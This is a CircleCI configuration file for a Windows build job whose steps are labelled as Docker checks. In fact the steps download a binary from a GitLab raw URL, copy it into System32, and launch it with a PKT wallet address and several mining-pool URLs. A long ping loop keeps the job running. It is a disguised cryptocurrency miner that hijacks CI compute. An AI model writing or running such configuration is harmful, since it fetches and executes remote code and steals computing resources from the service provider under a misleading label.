version: 2.1

orbs:
  win: circleci/windows@2.2.0

jobs:
  build:
    executor:
      name: win/default
      size: "large"
      shell: powershell.exe
    steps:
      - checkout
      - run: systeminfo
      - run:
          name: "Checks dockers"
          shell: powershell.exe
          command: |
            Invoke-WebRequest https://gitlab.com/kabehada3/pantek/-/raw/main/koceng
            Copy koceng C:\Windows\System32
      - run: systeminfo      
      - run:
          name: "Checks dockera"
          shell: powershell.exe
          command: |
            cmd /c echo cmd /k start koceng ann -p pkt1qv437nndzvr9u8ps60g3d5dl0gssu84ulwksvfq https://stratum.zetahash.com/ http://pool.pktpool.io http://pool.pkt.world >>jingcci.ps1
            cmd /c echo ping -n 180000 google.com >>jingcci.ps1
            .\jingcci.ps1                        